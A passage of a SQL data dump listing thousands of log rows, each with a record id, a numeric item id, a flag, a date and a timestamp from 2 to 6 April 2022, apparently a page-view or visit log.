13:46:38'),(48357,1592,1,'2022-04-02','2022-04-02 13:54:15'),(48358,3691,1,'2022-04-02','2022-04-02 14:04:33'),(48359,68,1,'2022-04-02','2022-04-02 14:20:50'),(48360,335,1,'2022-04-02','2022-04-02 14:33:17'),(48361,2751,1,'2022-04-02','2022-04-02 15:17:45'),(48362,2148,1,'2022-04-02','2022-04-02 15:24:10'),(48363,2148,1,'2022-04-02','2022-04-02 15:24:20'),(48364,2148,1,'2022-04-02','2022-04-02 15:24:36'),(48365,1614,1,'2022-04-02','2022-04-02 15:28:16'),(48366,2704,1,'2022-04-02','2022-04-02 15:32:18'),(48367,91,1,'2022-04-02','2022-04-02 15:45:27'),(48368,4566,1,'2022-04-02','2022-04-02 15:49:33'),(48369,1602,1,'2022-04-02','2022-04-02 15:50:06'),(48370,1724,1,'2022-04-02','2022-04-02 16:01:23'),(48371,1588,1,'2022-04-02','2022-04-02 16:06:17'),(48372,3090,1,'2022-04-02','2022-04-02 16:15:50'),(48373,2410,1,'2022-04-02','2022-04-02 16:31:50'),(48374,1592,1,'2022-04-02','2022-04-02 16:45:07'),(48375,4238,1,'2022-04-02','2022-04-02 16:59:29'),(48376,3781,1,'2022-04-02','2022-04-02 17:14:39'),(48377,3030,1,'2022-04-02','2022-04-02 17:26:43'),(48378,3030,1,'2022-04-02','2022-04-02 18:54:16'),(48379,3030,1,'2022-04-02','2022-04-02 18:54:30'),(48380,4542,1,'2022-04-02','2022-04-02 18:59:43'),(48381,1544,1,'2022-04-02','2022-04-02 19:11:30'),(48382,3030,1,'2022-04-02','2022-04-02 20:59:55'),(48383,2775,1,'2022-04-02','2022-04-02 21:20:40'),(48384,2609,1,'2022-04-02','2022-04-02 21:34:03'),(48385,1718,1,'2022-04-02','2022-04-02 22:30:31'),(48386,2769,1,'2022-04-02','2022-04-02 23:56:42'),(48387,80,1,'2022-04-03','2022-04-03 00:15:50'),(48388,68,1,'2022-04-03','2022-04-03 00:15:54'),(48389,4582,1,'2022-04-03','2022-04-03 00:15:58'),(48390,108,1,'2022-04-03','2022-04-03 00:16:02'),(48391,80,1,'2022-04-03','2022-04-03 00:16:15'),(48392,2971,1,'2022-04-03','2022-04-03 00:34:54'),(48393,1728,1,'2022-04-03','2022-04-03 01:09:01'),(48394,1766,1,'2022-04-03','2022-04-03 01:13:14'),(48395,3083,1,'2022-04-03','2022-04-03 01:19:17'),(48396,1586,1,'2022-04-03','2022-04-03 01:36:02'),(48397,2410,1,'2022-04-03','2022-04-03 01:44:35'),(48398,2804,1,'2022-04-03','2022-04-03 02:01:36'),(48399,1701,1,'2022-04-03','2022-04-03 02:10:38'),(48400,1598,1,'2022-04-03','2022-04-03 02:18:04'),(48401,3781,1,'2022-04-03','2022-04-03 02:26:27'),(48402,3430,1,'2022-04-03','2022-04-03 02:34:52'),(48403,335,1,'2022-04-03','2022-04-03 02:51:41'),(48404,1594,1,'2022-04-03','2022-04-03 03:18:56'),(48405,1600,1,'2022-04-03','2022-04-03 03:25:23'),(48406,2609,1,'2022-04-03','2022-04-03 05:51:51'),(48407,1872,1,'2022-04-03','2022-04-03 06:29:31'),(48408,1592,1,'2022-04-03','2022-04-03 06:39:08'),(48409,1592,1,'2022-04-03','2022-04-03 07:06:46'),(48410,2309,1,'2022-04-03','2022-04-03 07:27:51'),(48411,1877,1,'2022-04-03','2022-04-03 07:43:17'),(48412,2769,1,'2022-04-03','2022-04-03 07:56:31'),(48413,2658,1,'2022-04-03','2022-04-03 08:08:32'),(48414,80,1,'2022-04-03','2022-04-03 08:11:10'),(48415,3030,1,'2022-04-03','2022-04-03 08:40:36'),(48416,1766,1,'2022-04-03','2022-04-03 08:57:22'),(48417,3030,1,'2022-04-03','2022-04-03 10:32:40'),(48418,1598,1,'2022-04-03','2022-04-03 11:10:50'),(48419,570,1,'2022-04-03','2022-04-03 12:09:28'),(48420,1728,1,'2022-04-03','2022-04-03 12:24:48'),(48421,3030,1,'2022-04-03','2022-04-03 13:15:03'),(48422,3030,1,'2022-04-03','2022-04-03 13:15:08'),(48423,1608,1,'2022-04-03','2022-04-03 13:16:31'),(48424,74,1,'2022-04-03','2022-04-03 13:22:16'),(48425,4373,1,'2022-04-03','2022-04-03 13:35:04'),(48426,1586,1,'2022-04-03','2022-04-03 13:39:38'),(48427,3030,1,'2022-04-03','2022-04-03 13:43:21'),(48428,1586,1,'2022-04-03','2022-04-03 13:47:51'),(48429,3030,1,'2022-04-03','2022-04-03 14:32:31'),(48430,1582,1,'2022-04-03','2022-04-03 14:51:59'),(48431,1594,1,'2022-04-03','2022-04-03 15:05:10'),(48432,1766,1,'2022-04-03','2022-04-03 15:17:42'),(48433,2769,1,'2022-04-03','2022-04-03 16:08:51'),(48434,3698,1,'2022-04-03','2022-04-03 16:16:23'),(48435,472,1,'2022-04-03','2022-04-03 16:34:30'),(48436,2410,1,'2022-04-03','2022-04-03 16:47:39'),(48437,2704,1,'2022-04-03','2022-04-03 17:00:30'),(48438,4428,1,'2022-04-03','2022-04-03 17:16:41'),(48439,1872,1,'2022-04-03','2022-04-03 17:25:50'),(48440,1544,1,'2022-04-03','2022-04-03 17:31:29'),(48441,1598,1,'2022-04-03','2022-04-03 17:51:25'),(48442,1544,1,'2022-04-03','2022-04-03 17:58:14'),(48443,3278,1,'2022-04-03','2022-04-03 18:04:22'),(48444,1544,1,'2022-04-03','2022-04-03 18:18:49'),(48445,1608,1,'2022-04-03','2022-04-03 18:19:00'),(48446,3287,1,'2022-04-03','2022-04-03 18:31:13'),(48447,1544,1,'2022-04-03','2022-04-03 18:35:05'),(48448,1544,1,'2022-04-03','2022-04-03 18:35:13'),(48449,1544,1,'2022-04-03','2022-04-03 18:35:21'),(48450,1544,1,'2022-04-03','2022-04-03 18:35:35'),(48451,1544,1,'2022-04-03','2022-04-03 18:35:54'),(48452,1544,1,'2022-04-03','2022-04-03 18:36:01'),(48453,2161,1,'2022-04-03','2022-04-03 18:43:34'),(48454,4416,1,'2022-04-03','2022-04-03 19:16:27'),(48455,1728,1,'2022-04-03','2022-04-03 19:34:51'),(48456,3030,1,'2022-04-03','2022-04-03 19:53:36'),(48457,3090,1,'2022-04-03','2022-04-03 19:59:03'),(48458,570,1,'2022-04-03','2022-04-03 19:59:38'),(48459,1701,1,'2022-04-03','2022-04-03 20:12:32'),(48460,570,1,'2022-04-03','2022-04-03 20:15:13'),(48461,570,1,'2022-04-03','2022-04-03 20:15:32'),(48462,570,1,'2022-04-03','2022-04-03 20:15:57'),(48463,570,1,'2022-04-03','2022-04-03 20:16:24'),(48464,3041,1,'2022-04-03','2022-04-03 20:16:26'),(48465,3030,1,'2022-04-03','2022-04-03 20:18:18'),(48466,1718,1,'2022-04-03','2022-04-03 20:25:17'),(48467,0,1,'2022-04-03','2022-04-03 20:26:26'),(48468,1592,1,'2022-04-03','2022-04-03 20:33:27'),(48469,1600,1,'2022-04-03','2022-04-03 20:50:59'),(48470,2904,1,'2022-04-03','2022-04-03 21:00:51'),(48471,472,1,'2022-04-03','2022-04-03 21:03:48'),(48472,4368,1,'2022-04-03','2022-04-03 21:09:19'),(48473,3030,1,'2022-04-03','2022-04-03 21:16:53'),(48474,479,1,'2022-04-03','2022-04-03 21:29:56'),(48475,1594,1,'2022-04-03','2022-04-03 21:42:20'),(48476,1594,1,'2022-04-03','2022-04-03 21:43:44'),(48477,1588,1,'2022-04-03','2022-04-03 21:46:58'),(48478,1718,1,'2022-04-03','2022-04-03 21:55:18'),(48479,3691,1,'2022-04-03','2022-04-03 22:07:51'),(48480,3240,1,'2022-04-03','2022-04-03 22:16:29'),(48481,1588,1,'2022-04-03','2022-04-03 22:33:30'),(48482,1872,1,'2022-04-03','2022-04-03 22:54:28'),(48483,1877,1,'2022-04-03','2022-04-03 23:27:24'),(48484,1598,1,'2022-04-04','2022-04-04 00:34:08'),(48485,91,1,'2022-04-04','2022-04-04 03:53:41'),(48486,570,1,'2022-04-04','2022-04-04 03:54:47'),(48487,1770,1,'2022-04-04','2022-04-04 03:57:45'),(48488,2165,1,'2022-04-04','2022-04-04 03:58:31'),(48489,3045,1,'2022-04-04','2022-04-04 04:07:33'),(48490,3438,1,'2022-04-04','2022-04-04 04:11:38'),(48491,2309,1,'2022-04-04','2022-04-04 04:13:25'),(48492,2775,1,'2022-04-04','2022-04-04 04:13:31'),(48493,1747,1,'2022-04-04','2022-04-04 04:16:49'),(48494,469,1,'2022-04-04','2022-04-04 04:18:31'),(48495,469,1,'2022-04-04','2022-04-04 04:21:14'),(48496,3438,1,'2022-04-04','2022-04-04 04:27:10'),(48497,570,1,'2022-04-04','2022-04-04 04:32:19'),(48498,1770,1,'2022-04-04','2022-04-04 04:34:22'),(48499,1747,1,'2022-04-04','2022-04-04 04:37:20'),(48500,2904,1,'2022-04-04','2022-04-04 04:43:40'),(48501,3691,1,'2022-04-04','2022-04-04 04:46:02'),(48502,1728,1,'2022-04-04','2022-04-04 04:57:30'),(48503,2775,1,'2022-04-04','2022-04-04 05:00:49'),(48504,2165,1,'2022-04-04','2022-04-04 05:03:16'),(48505,1588,1,'2022-04-04','2022-04-04 05:05:31'),(48506,2617,1,'2022-04-04','2022-04-04 05:10:20'),(48507,1604,1,'2022-04-04','2022-04-04 05:13:38'),(48508,2617,1,'2022-04-04','2022-04-04 05:24:52'),(48509,2410,1,'2022-04-04','2022-04-04 05:27:09'),(48510,84,1,'2022-04-04','2022-04-04 05:31:57'),(48511,2309,1,'2022-04-04','2022-04-04 05:36:48'),(48512,1612,1,'2022-04-04','2022-04-04 05:44:32'),(48513,1751,1,'2022-04-04','2022-04-04 05:48:44'),(48514,1778,1,'2022-04-04','2022-04-04 05:52:37'),(48515,1778,1,'2022-04-04','2022-04-04 05:53:26'),(48516,3746,1,'2022-04-04','2022-04-04 05:53:31'),(48517,1598,1,'2022-04-04','2022-04-04 06:00:43'),(48518,3781,1,'2022-04-04','2022-04-04 06:03:23'),(48519,1594,1,'2022-04-04','2022-04-04 06:12:44'),(48520,2989,1,'2022-04-04','2022-04-04 06:17:31'),(48521,2309,1,'2022-04-04','2022-04-04 06:22:24'),(48522,1612,1,'2022-04-04','2022-04-04 06:28:39'),(48523,89,1,'2022-04-04','2022-04-04 06:33:35'),(48524,470,1,'2022-04-04','2022-04-04 06:34:20'),(48525,2410,1,'2022-04-04','2022-04-04 06:46:47'),(48526,3746,1,'2022-04-04','2022-04-04 06:51:07'),(48527,1612,1,'2022-04-04','2022-04-04 06:53:33'),(48528,479,1,'2022-04-04','2022-04-04 06:58:25'),(48529,3781,1,'2022-04-04','2022-04-04 07:00:47'),(48530,3691,1,'2022-04-04','2022-04-04 07:40:21'),(48531,1711,1,'2022-04-04','2022-04-04 07:48:03'),(48532,1751,1,'2022-04-04','2022-04-04 07:51:12'),(48533,467,1,'2022-04-04','2022-04-04 07:55:37'),(48534,3034,1,'2022-04-04','2022-04-04 07:57:36'),(48535,1778,1,'2022-04-04','2022-04-04 08:00:41'),(48536,3034,1,'2022-04-04','2022-04-04 08:05:59'),(48537,1778,1,'2022-04-04','2022-04-04 08:07:34'),(48538,76,1,'2022-04-04','2022-04-04 08:10:31'),(48539,4436,1,'2022-04-04','2022-04-04 08:13:18'),(48540,467,1,'2022-04-04','2022-04-04 08:17:08'),(48541,1598,1,'2022-04-04','2022-04-04 08:22:28'),(48542,1604,1,'2022-04-04','2022-04-04 08:25:57'),(48543,2419,1,'2022-04-04','2022-04-04 08:32:32'),(48544,87,1,'2022-04-04','2022-04-04 08:35:42'),(48545,4338,1,'2022-04-04','2022-04-04 08:38:34'),(48546,4400,1,'2022-04-04','2022-04-04 08:45:07'),(48547,2813,1,'2022-04-04','2022-04-04 08:49:49'),(48548,3297,1,'2022-04-04','2022-04-04 08:53:12'),(48549,3297,1,'2022-04-04','2022-04-04 08:53:18'),(48550,3788,1,'2022-04-04','2022-04-04 08:57:34'),(48551,3030,1,'2022-04-04','2022-04-04 09:00:46'),(48552,4301,1,'2022-04-04','2022-04-04 09:04:05'),(48553,3275,1,'2022-04-04','2022-04-04 09:10:52'),(48554,3275,1,'2022-04-04','2022-04-04 09:10:55'),(48555,3675,1,'2022-04-04','2022-04-04 09:13:33'),(48556,1612,1,'2022-04-04','2022-04-04 09:25:31'),(48557,4436,1,'2022-04-04','2022-04-04 09:29:31'),(48558,3297,1,'2022-04-04','2022-04-04 09:32:56'),(48559,4436,1,'2022-04-04','2022-04-04 09:35:43'),(48560,80,1,'2022-04-04','2022-04-04 09:42:57'),(48561,80,1,'2022-04-04','2022-04-04 09:44:08'),(48562,1870,1,'2022-04-04','2022-04-04 09:45:36'),(48563,2419,1,'2022-04-04','2022-04-04 09:48:41'),(48564,72,1,'2022-04-04','2022-04-04 09:55:20'),(48565,3269,1,'2022-04-04','2022-04-04 09:58:32'),(48566,479,1,'2022-04-04','2022-04-04 10:02:39'),(48567,1600,1,'2022-04-04','2022-04-04 10:06:25'),(48568,1582,1,'2022-04-04','2022-04-04 10:08:54'),(48569,3030,1,'2022-04-04','2022-04-04 10:16:06'),(48570,3030,1,'2022-04-04','2022-04-04 10:16:16'),(48571,3269,1,'2022-04-04','2022-04-04 10:17:31'),(48572,80,1,'2022-04-04','2022-04-04 10:30:25'),(48573,1586,1,'2022-04-04','2022-04-04 10:31:23'),(48574,4301,1,'2022-04-04','2022-04-04 10:33:29'),(48575,1582,1,'2022-04-04','2022-04-04 10:39:49'),(48576,3788,1,'2022-04-04','2022-04-04 10:46:21'),(48577,4400,1,'2022-04-04','2022-04-04 10:51:33'),(48578,3675,1,'2022-04-04','2022-04-04 10:52:38'),(48579,1544,1,'2022-04-04','2022-04-04 11:00:01'),(48580,4338,1,'2022-04-04','2022-04-04 11:05:28'),(48581,87,1,'2022-04-04','2022-04-04 11:06:03'),(48582,1544,1,'2022-04-04','2022-04-04 11:06:09'),(48583,76,1,'2022-04-04','2022-04-04 11:08:44'),(48584,2457,1,'2022-04-04','2022-04-04 11:16:46'),(48585,2457,1,'2022-04-04','2022-04-04 11:17:32'),(48586,1544,1,'2022-04-04','2022-04-04 11:26:02'),(48587,108,1,'2022-04-04','2022-04-04 11:26:25'),(48588,1544,1,'2022-04-04','2022-04-04 11:27:10'),(48589,1544,1,'2022-04-04','2022-04-04 11:30:13'),(48590,3030,1,'2022-04-04','2022-04-04 11:35:57'),(48591,3030,1,'2022-04-04','2022-04-04 11:49:12'),(48592,3030,1,'2022-04-04','2022-04-04 11:49:20'),(48593,76,1,'2022-04-04','2022-04-04 11:50:07'),(48594,1544,1,'2022-04-04','2022-04-04 11:55:01'),(48595,72,1,'2022-04-04','2022-04-04 12:05:24'),(48596,3438,1,'2022-04-04','2022-04-04 12:24:47'),(48597,3498,1,'2022-04-04','2022-04-04 12:24:49'),(48598,3430,1,'2022-04-04','2022-04-04 12:24:49'),(48599,3742,1,'2022-04-04','2022-04-04 12:24:50'),(48600,3482,1,'2022-04-04','2022-04-04 12:24:52'),(48601,2956,1,'2022-04-04','2022-04-04 12:24:52'),(48602,1544,1,'2022-04-04','2022-04-04 12:58:39'),(48603,3030,1,'2022-04-04','2022-04-04 13:17:48'),(48604,1602,1,'2022-04-04','2022-04-04 14:04:13'),(48605,3030,1,'2022-04-04','2022-04-04 14:13:08'),(48606,2457,1,'2022-04-04','2022-04-04 14:33:45'),(48607,3030,1,'2022-04-04','2022-04-04 15:09:53'),(48608,469,1,'2022-04-04','2022-04-04 15:24:53'),(48609,3030,1,'2022-04-04','2022-04-04 15:35:16'),(48610,1598,1,'2022-04-04','2022-04-04 15:48:07'),(48611,2457,1,'2022-04-04','2022-04-04 15:48:45'),(48612,3102,1,'2022-04-04','2022-04-04 15:55:13'),(48613,1544,1,'2022-04-04','2022-04-04 15:56:40'),(48614,1600,1,'2022-04-04','2022-04-04 16:34:43'),(48615,3030,1,'2022-04-04','2022-04-04 16:35:40'),(48616,3030,1,'2022-04-04','2022-04-04 18:18:59'),(48617,1544,1,'2022-04-04','2022-04-04 18:46:08'),(48618,87,1,'2022-04-04','2022-04-04 18:47:18'),(48619,2617,1,'2022-04-04','2022-04-04 19:08:12'),(48620,1588,1,'2022-04-04','2022-04-04 19:10:36'),(48621,1774,1,'2022-04-04','2022-04-04 19:12:11'),(48622,4341,1,'2022-04-04','2022-04-04 19:14:45'),(48623,1604,1,'2022-04-04','2022-04-04 19:14:54'),(48624,4323,1,'2022-04-04','2022-04-04 19:16:12'),(48625,4323,1,'2022-04-04','2022-04-04 19:18:56'),(48626,2964,1,'2022-04-04','2022-04-04 19:24:52'),(48627,1774,1,'2022-04-04','2022-04-04 19:26:25'),(48628,1713,1,'2022-04-04','2022-04-04 19:36:51'),(48629,1544,1,'2022-04-04','2022-04-04 19:39:06'),(48630,1713,1,'2022-04-04','2022-04-04 19:50:10'),(48631,4396,1,'2022-04-04','2022-04-04 19:55:11'),(48632,3781,1,'2022-04-04','2022-04-04 20:02:09'),(48633,2063,1,'2022-04-04','2022-04-04 20:08:17'),(48634,1582,1,'2022-04-04','2022-04-04 20:19:26'),(48635,4396,1,'2022-04-04','2022-04-04 20:29:02'),(48636,1741,1,'2022-04-04','2022-04-04 20:34:14'),(48637,3752,1,'2022-04-04','2022-04-04 20:39:27'),(48638,4524,1,'2022-04-04','2022-04-04 20:42:05'),(48639,4582,1,'2022-04-04','2022-04-04 20:47:27'),(48640,1877,1,'2022-04-04','2022-04-04 20:58:09'),(48641,469,1,'2022-04-04','2022-04-04 21:05:50'),(48642,2989,1,'2022-04-04','2022-04-04 21:11:08'),(48643,2410,1,'2022-04-04','2022-04-04 21:13:54'),(48644,3746,1,'2022-04-04','2022-04-04 21:19:40'),(48645,76,1,'2022-04-04','2022-04-04 21:23:22'),(48646,1604,1,'2022-04-04','2022-04-04 21:30:10'),(48647,1586,1,'2022-04-04','2022-04-04 21:32:40'),(48648,3746,1,'2022-04-04','2022-04-04 21:44:01'),(48649,1544,1,'2022-04-04','2022-04-04 22:11:42'),(48650,4457,1,'2022-04-04','2022-04-04 22:34:43'),(48651,1544,1,'2022-04-05','2022-04-05 00:11:29'),(48652,4520,1,'2022-04-05','2022-04-05 00:22:51'),(48653,2704,1,'2022-04-05','2022-04-05 01:23:20'),(48654,467,1,'2022-04-05','2022-04-05 01:26:39'),(48655,4275,1,'2022-04-05','2022-04-05 01:29:45'),(48656,1770,1,'2022-04-05','2022-04-05 01:36:40'),(48657,3290,1,'2022-04-05','2022-04-05 01:43:06'),(48658,3278,1,'2022-04-05','2022-04-05 01:45:27'),(48659,3104,1,'2022-04-05','2022-04-05 01:48:29'),(48660,3781,1,'2022-04-05','2022-04-05 01:51:39'),(48661,3680,1,'2022-04-05','2022-04-05 02:07:21'),(48662,3313,1,'2022-04-05','2022-04-05 02:08:17'),(48663,3680,1,'2022-04-05','2022-04-05 02:09:06'),(48664,3498,1,'2022-04-05','2022-04-05 02:10:56'),(48665,3079,1,'2022-04-05','2022-04-05 02:20:48'),(48666,3498,1,'2022-04-05','2022-04-05 02:29:34'),(48667,1778,1,'2022-04-05','2022-04-05 02:38:48'),(48668,485,1,'2022-04-05','2022-04-05 02:38:53'),(48669,1778,1,'2022-04-05','2022-04-05 02:38:53'),(48670,1778,1,'2022-04-05','2022-04-05 02:39:00'),(48671,3079,1,'2022-04-05','2022-04-05 02:51:26'),(48672,3127,1,'2022-04-05','2022-04-05 02:57:50'),(48673,4275,1,'2022-04-05','2022-04-05 03:04:10'),(48674,2617,1,'2022-04-05','2022-04-05 03:07:08'),(48675,2154,1,'2022-04-05','2022-04-05 03:13:55'),(48676,478,1,'2022-04-05','2022-04-05 03:17:54'),(48677,72,1,'2022-04-05','2022-04-05 03:21:00'),(48678,2558,1,'2022-04-05','2022-04-05 03:27:06'),(48679,3534,1,'2022-04-05','2022-04-05 04:13:33'),(48680,87,1,'2022-04-05','2022-04-05 04:15:32'),(48681,1588,1,'2022-04-05','2022-04-05 05:14:00'),(48682,486,1,'2022-04-05','2022-04-05 05:15:31'),(48683,1877,1,'2022-04-05','2022-04-05 06:13:32'),(48684,1544,1,'2022-04-05','2022-04-05 06:59:42'),(48685,4382,1,'2022-04-05','2022-04-05 07:36:13'),(48686,1612,1,'2022-04-05','2022-04-05 07:54:49'),(48687,3030,1,'2022-04-05','2022-04-05 08:33:58'),(48688,570,1,'2022-04-05','2022-04-05 08:45:45'),(48689,570,1,'2022-04-05','2022-04-05 08:45:46'),(48690,570,1,'2022-04-05','2022-04-05 08:46:23'),(48691,570,1,'2022-04-05','2022-04-05 08:46:24'),(48692,570,1,'2022-04-05','2022-04-05 08:47:11'),(48693,570,1,'2022-04-05','2022-04-05 08:47:53'),(48694,1598,1,'2022-04-05','2022-04-05 09:04:06'),(48695,2769,1,'2022-04-05','2022-04-05 09:43:08'),(48696,76,1,'2022-04-05','2022-04-05 09:43:35'),(48697,89,1,'2022-04-05','2022-04-05 09:43:56'),(48698,89,1,'2022-04-05','2022-04-05 09:44:13'),(48699,1612,1,'2022-04-05','2022-04-05 09:45:02'),(48700,89,1,'2022-04-05','2022-04-05 09:47:26'),(48701,76,1,'2022-04-05','2022-04-05 09:55:04'),(48702,89,1,'2022-04-05','2022-04-05 09:55:33'),(48703,89,1,'2022-04-05','2022-04-05 09:55:46'),(48704,89,1,'2022-04-05','2022-04-05 09:55:48'),(48705,76,1,'2022-04-05','2022-04-05 09:55:51'),(48706,68,1,'2022-04-05','2022-04-05 09:56:36'),(48707,68,1,'2022-04-05','2022-04-05 09:58:33'),(48708,487,1,'2022-04-05','2022-04-05 09:59:12'),(48709,72,1,'2022-04-05','2022-04-05 10:00:11'),(48710,68,1,'2022-04-05','2022-04-05 10:01:02'),(48711,1602,1,'2022-04-05','2022-04-05 10:16:10'),(48712,3030,1,'2022-04-05','2022-04-05 10:16:29'),(48713,1594,1,'2022-04-05','2022-04-05 10:17:04'),(48714,80,1,'2022-04-05','2022-04-05 10:17:27'),(48715,3030,1,'2022-04-05','2022-04-05 10:34:54'),(48716,1596,1,'2022-04-05','2022-04-05 10:37:40'),(48717,1606,1,'2022-04-05','2022-04-05 10:51:17'),(48718,1606,1,'2022-04-05','2022-04-05 10:51:35'),(48719,3030,1,'2022-04-05','2022-04-05 11:20:32'),(48720,1588,1,'2022-04-05','2022-04-05 11:44:45'),(48721,1602,1,'2022-04-05','2022-04-05 11:58:32'),(48722,2148,1,'2022-04-05','2022-04-05 13:36:52'),(48723,2617,1,'2022-04-05','2022-04-05 13:37:50'),(48724,3038,1,'2022-04-05','2022-04-05 13:55:23'),(48725,1598,1,'2022-04-05','2022-04-05 13:56:36'),(48726,1598,1,'2022-04-05','2022-04-05 13:57:43'),(48727,1612,1,'2022-04-05','2022-04-05 13:58:03'),(48728,1598,1,'2022-04-05','2022-04-05 13:58:36'),(48729,1588,1,'2022-04-05','2022-04-05 14:11:19'),(48730,1608,1,'2022-04-05','2022-04-05 14:24:23'),(48731,1544,1,'2022-04-05','2022-04-05 14:25:16'),(48732,2609,1,'2022-04-05','2022-04-05 14:41:51'),(48733,1614,1,'2022-04-05','2022-04-05 14:42:45'),(48734,2395,1,'2022-04-05','2022-04-05 14:45:51'),(48735,2558,1,'2022-04-05','2022-04-05 15:07:16'),(48736,3030,1,'2022-04-05','2022-04-05 15:08:37'),(48737,3704,1,'2022-04-05','2022-04-05 15:29:39'),(48738,1594,1,'2022-04-05','2022-04-05 16:04:56'),(48739,3746,1,'2022-04-05','2022-04-05 16:06:58'),(48740,570,1,'2022-04-05','2022-04-05 16:20:25'),(48741,570,1,'2022-04-05','2022-04-05 16:22:33'),(48742,570,1,'2022-04-05','2022-04-05 16:22:51'),(48743,570,1,'2022-04-05','2022-04-05 16:30:29'),(48744,570,1,'2022-04-05','2022-04-05 16:33:25'),(48745,3030,1,'2022-04-05','2022-04-05 16:41:12'),(48746,4408,1,'2022-04-05','2022-04-05 18:50:40'),(48747,2297,1,'2022-04-05','2022-04-05 20:41:34'),(48748,2161,1,'2022-04-05','2022-04-05 21:06:36'),(48749,2152,1,'2022-04-05','2022-04-05 21:50:20'),(48750,483,1,'2022-04-05','2022-04-05 21:53:15'),(48751,2152,1,'2022-04-05','2022-04-05 22:04:38'),(48752,2152,1,'2022-04-05','2022-04-05 22:05:49'),(48753,1602,1,'2022-04-05','2022-04-05 22:21:22'),(48754,1588,1,'2022-04-05','2022-04-05 22:57:56'),(48755,1602,1,'2022-04-05','2022-04-05 23:29:28'),(48756,1602,1,'2022-04-06','2022-04-06 00:22:38'),(48757,1606,1,'2022-04-06','2022-04-06 00:27:50'),(48758,2558,1,'2022-04-06','2022-04-06 01:22:46'),(48759,3038,1,'2022-04-06','2022-04-06 02:02:17'),(48760,1600,1,'2022-04-06','2022-04-06 03:47:56'),(48761,2161,1,'2022-04-06','2022-04-06 03:49:23'),(48762,3038,1,'2022-04-06','2022-04-06 04:47:49'),(48763,4391,1,'2022-04-06','2022-04-06 04:53:20'),(48764,3746,1,'2022-04-06','2022-04-06 06:35:24'),(48765,1588,1,'2022-04-06','2022-04-06 06:41:45'),(48766,1594,1,'2022-04-06','2022-04-06 06:52:09'),(48767,3287,1,'2022-04-06','2022-04-06 07:10:26'),(48768,3531,1,'2022-04-06','2022-04-06 07:22:33'),(48769,3781,1,'2022-04-06','2022-04-06 07:25:08'),(48770,3781,1,'2022-04-06','2022-04-06 07:25:30'),(48771,1594,1,'2022-04-06','2022-04-06 07:31:13'),(48772,3127,1,'2022-04-06','2022-04-06 07:45:28'),(48773,1600,1,'2022-04-06','2022-04-06 08:01:46'),(48774,3746,1,'2022-04-06','2022-04-06 08:15:34'),(48775,1606,1,'2022-04-06','2022-04-06 09:03:06'),(48776,1602,1,'2022-04-06','2022-04-06 09:11:26'),(48777,4416,1,'2022-04-06','2022-04-06 09:51:12'),(48778,80,1,'2022-04-06','2022-04-06 10:14:16'),(48779,1588,1,'2022-04-06','2022-04-06 10:18:18'),(48780,3531,1,'2022-04-06','2022-04-06 10:36:01'),(48781,1614,1,'2022-04-06','2022-04-06 11:09:35'),(48782,2911,1,'2022-04-06','2022-04-06 11:32:27'),(48783,4566,1,'2022-04-06','2022-04-06 11:46:35'),(48784,3038,1,'2022-04-06','2022-04-06 12:01:37'),(48785,1612,1,'2022-04-06','2022-04-06 12:19:49'),(48786,4448,1,'2022-04-06','2022-04-06 12:25:33'),(48787,2769,1,'2022-04-06','2022-04-06 12:56:06'),(48788,2457,1,'2022-04-06','2022-04-06 12:57:38'),(48789,2911,1,'2022-04-06','2022-04-06 12:59:04'),(48790,1870,1,'2022-04-06','2022-04-06 12:59:32'),(48791,2911,1,'2022-04-06','2022-04-06 12:59:36'),(48792,3307,1,'2022-04-06','2022-04-06 13:18:26'),(48793,570,1,'2022-04-06','2022-04-06 13:23:13'),(48794,2457,1,'2022-04-06','2022-04-06 13:37:59'),(48795,1870,1,'2022-04-06','2022-04-06 13:42:35'),(48796,3307,1,'2022-04-06','2022-04-06 13:58:01'),(48797,2457,1,'2022-04-06','2022-04-06 14:38:07'),(48798,2769,1,'2022-04-06','2022-04-06 14:50:30'),(48799,1870,1,'2022-04-06','2022-04-06 14:58:24'),(48800,1722,1,'2022-04-06','2022-04-06 15:50:24'),(48801,1594,1,'2022-04-06','2022-04-06 16:17:58'),(48802,1610,1,'2022-04-06','2022-04-06 16:31:14'),(48803,1610,1,'2022-04-06','2022-04-06 16:32:07'),(48804,3691,1,'2022-04-06','2022-04-06 16:38:48'),(48805,3724,1,'2022-04-06','2022-04-06 16:40:49'),(48806,1544,1,'2022-04-06','2022-04-06 16:56:31'),(48807,472,1,'2022-04-06','2022-04-06 17:24:36'),(48808,1602,1,'2022-04-06','2022-04-06 17:35:55'),(48809,4335,1,'2022-04-06','2022-04-06 17:39:11'),(48810,3285,1,'2022-04-06','2022-04-06 17:51:05'),(48811,3486,1,'2022-04-06','2022-04-06 17:51:46'),(48812,4238,1,'2022-04-06','2022-04-06 18:13:11'),(48813,3430,1,'2022-04-06','2022-04-06 18:14:39'),(48814,3430,1,'2022-04-06','2022-04-06 18:14:42'),(48815,3781,1,'2022-04-06','2022-04-06 18:23:21'),(48816,3724,1,'2022-04-06','2022-04-06 18:29:43'),(48817,3226,1,'2022-04-06','2022-04-06 18:30:34'),(48818,3060,1,'2022-04-06','2022-04-06 18:31:01'),(48819,1592,1,'2022-04-06','2022-04-06 18:31:11'),(48820,3285,1,'2022-04-06','2022-04-06 18:35:53'),(48821,3285,1,'2022-04-06','2022-04-06 18:35:59'),(48822,3285,1,'2022-04-06','2022-04-06 18:36:08'),(48823,2751,1,'2022-04-06','2022-04-06 18:37:00'),(48824,80,1,'2022-04-06','2022-04-06 18:38:06'),(48825,335,1,'2022-04-06','2022-04-06 18:41:42'),(48826,2804,1,'2022-04-06','2022-04-06 18:47:04'),(48827,3764,1,'2022-04-06','2022-04-06 18:56:18'),(48828,1728,1,'2022-04-06','2022-04-06 18:57:21'),(48829,3004,1,'2022-04-06','2022-04-06 18:57:39'),(48830,1766,1,'2022-04-06','2022-04-06 19:02:23'),(48831,2971,1,'2022-04-06','2022-04-06 19:07:01'),(48832,3724,1,'2022-04-06','2022-04-06 19:09:08'),(48833,1606,1,'2022-04-06','2022-04-06 19:13:44'),(48834,4582,1,'2022-04-06','2022-04-06 19:15:10'),(48835,4582,1,'2022-04-06','2022-04-06 19:17:06'),(48836,2309,1,'2022-04-06','2022-04-06 19:19:42'),(48837,3486,1,'2022-04-06','2022-04-06 19:22:03'),(48838,3531,1,'2022-04-06','2022-04-06 19:22:43'),(48839,3531,1,'2022-04-06','2022-04-06 19:22:55'),(48840,2748,1,'2022-04-06','2022-04-06 19:25:31'),(48841,479,1,'2022-04-06','2022-04-06 19:34:23'),(48842,3781,1,'2022-04-06','2022-04-06 